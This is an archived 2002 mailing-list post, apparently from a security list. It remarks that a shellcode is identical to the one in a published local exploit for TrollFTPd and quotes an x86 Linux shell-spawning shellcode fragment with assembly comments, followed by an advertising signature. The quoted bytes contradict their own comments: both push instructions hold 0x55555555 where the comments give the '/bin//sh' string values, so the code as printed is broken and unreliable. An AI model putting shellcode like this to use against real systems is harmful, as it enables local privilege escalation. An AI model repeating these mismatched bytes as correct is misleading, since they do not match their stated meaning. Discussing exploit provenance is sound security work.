just to note: The shellcode is exactly the same as that from zen-parse' local exploit for TrollFTPd (1.26) see: http://www.securityfocus.com/archive/1/203874 ---- "\x68\x55\x55\x55\x55" // push dword 68732f6eh "\x68\x55\x55\x55\x55" // push dword 69622f2fh "\x89\xe3" // mov ebx, esp "\x51" // push ecx "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\xb0\x0b" // mov al, 11 "\xcd\x80"; // int 80h ---- --------------------------------------------------------------------- Would you like to receive faxes to your personal email address? You can with mBox. Visit http://www.mbox.com.au/fax
This archive was generated by hypermail 2b30 : Tue Feb 19 2002 - 22:33:37 PST